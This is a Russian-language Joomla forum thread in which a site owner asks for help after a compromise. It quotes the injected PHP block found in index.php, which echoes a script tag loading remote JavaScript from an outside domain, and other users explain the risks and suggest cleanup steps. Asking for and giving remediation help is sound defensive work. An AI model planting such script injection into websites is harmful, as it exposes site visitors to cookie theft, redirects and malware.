Новости Joomla

Вышли релизы безопасности Joomla 6.0.2 и Joomla 5.4.2

Релиз безопасности Joomla 6.0.2 и 5.4.2

Проект Joomla спешит сообщить о выпуске Joomla 6.0.2 и Joomla 5.4.2. Это релиз безопасности для серии Joomla 6.0 и релиз безопасности для серии Joomla 5.4.

Обновление Joomlaportal.ru

Обновление Joomlaportal.ru

Рады сообщить о значительном обновлении старейшего ресурса по Joomla в рунете.

Есть традиция: каждые три версии Joomla мы меняем дизайн на сайте. С выходом Joomla 6 мы решили обновить оформление, а заодно пересмотреть концепцию портала.

JL Content Fields Filter 4.0.0

JL Content Fields Filter 4.0.0

JL Content Fields Filter - Это бесплатный модуль, который фильтрует материалы в категории Joomla согласно настраиваемым полям.

Данный крупный релиз включает полную совместимость с Joomla 6, критические исправления безопасности, полностью модернизированный интерфейс администратора и обширный рефакторинг кода.

Ключевые Особенности:

- Полная совместимость с Joomla 6: Полная миграция на PSR-4, удаление устаревших методов, исправления для PHP 8.2+ и современные взаимодействия с базой данных.

- Полностью переписанный интерфейс компонента:

- Современный JS стек (Native Fetch, ES6+, модальные окна Bootstrap 5)

- Новое поле FilterfieldsField для предварительного просмотра фильтров в реальном времени.

- Полный CRUD, улучшенные функции SEO и улучшенный UX.

- Критические исправления безопасности:

- 5 SQL-инъекций устранены в нескольких файлах.

- Добавлена защита от XSS, улучшены токены CSRF и проверки разрешений.

- Улучшения модуля и плагина: Улучшенная функциональность слайдера, лучшие сбросы форм, динамическое обнаружение контекста для плагинов и оптимизированная логика фильтрации.

Страница расширения:
https://joomline.ru/rasshirenija/moduli/jlcontentfieldsfilter.html

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 1934 Просмотров
*

ap11

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
  • Разработка сайтов на Joomla!
Взломана Joomla, непонятный скрипт
« : 21.06.2015, 00:01:22 »
Есть несколько сайтов на одном хостинге: один из них на Joomla 1.5, другие на Joomla 2.5.4
Произошел взлом какого-то сайта, наверное 1.5, в результате заражены были все сайты.
В файле index.php всех сайтов стоит блок:

Код
<?php
#033761#
if(empty($j)) {
$j = "<script type=\"text/javascript\" src=\"http://ghseif.us/manage/login/6fh1tz6y.php?id=12745\"></script>";
echo $j;
}
#/033761#
?>


если смотреть код сайта в HTML то там просто стоит скрипт в коде:

Код
<script type="text/javascript" src="http://ghseif.us/manage/login/6fh1tz6y.php?id=12745"></script>

Вопрос: в чем смысл этой ссылки в скрипте? она ведь не индексируется поисковиком... или может быть редирект при каких-то условиях..?

И решится проблема, если просто обновить сайты и убрать этот код из index.php?

И еще не совсем понятно ситуация: в корне сайта есть папки с датой изменения как и файла index.php, но в папках нет файлов этой даты, все файлы старые.. это тоже могло быть изменено при взломе?
« Последнее редактирование: 21.06.2015, 00:08:17 от ap11 »
Записан
*

zomby6888

  • Завсегдатай
  • 1473
  • 171 / 3
Re: Взломана Joomla, непонятный скрипт
« Ответ #1 : 21.06.2015, 00:19:23 »
Цитировать
Вопрос: в чем смысл этой ссылки в скрипте?

В том что произвольный код исполняется на страницах сайта. Он может что угодно делать, воровать пользовательские кукисы и данные,  или перенаправлять пользователей например.
Записан
интернет-блог: http://websiteprog.ru
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Взломана Joomla, непонятный скрипт
« Ответ #2 : 21.06.2015, 00:22:13 »
Проблема решается откатом сайтов из резервной копии и дальнейшим обновлением или поиском уязвимостей.
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломана Joomla, непонятный скрипт
« Ответ #3 : 21.06.2015, 05:24:37 »
Если Joomla до 1.5.26, и до 2.5.28, то все содержат уязвимость.
Сканер айболит в помощь
Записан
*

wishlight

  • Гуру
  • 5076
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломана Joomla, непонятный скрипт
« Ответ #4 : 21.06.2015, 06:53:26 »
Кроме этого каждый сайт надо отделить от другого.
Записан
*

ap11

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
  • Разработка сайтов на Joomla!
Re: Взломана Joomla, непонятный скрипт
« Ответ #5 : 21.06.2015, 16:08:12 »
спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
Записан
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Взломана Joomla, непонятный скрипт
« Ответ #6 : 21.06.2015, 19:57:10 »
Взлом ещё может быть от того, что вирус в вашем компьютере украл пароль от ftp
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломана Joomla, непонятный скрипт
« Ответ #7 : 22.06.2015, 07:26:40 »
Цитата: ap11 от 21.06.2015, 16:08:12
спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
Конкретно встречался с уязвимостями на Ackeeba Backup, Fox Contact, RokGallery, здается мне если в сторону других капнуть, там тоже всплывет что нить...
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

 Ответов: 1
Просмотров: 2661 		Последний ответ 23.04.2024, 10:06:10
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

 Ответов: 110
Просмотров: 71572 		Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 3533 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

 Ответов: 6
Просмотров: 3507 		Последний ответ 16.05.2023, 16:38:58
от mister_boy
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

 Ответов: 5
Просмотров: 2619 		Последний ответ 13.09.2021, 09:23:28
от Oleg+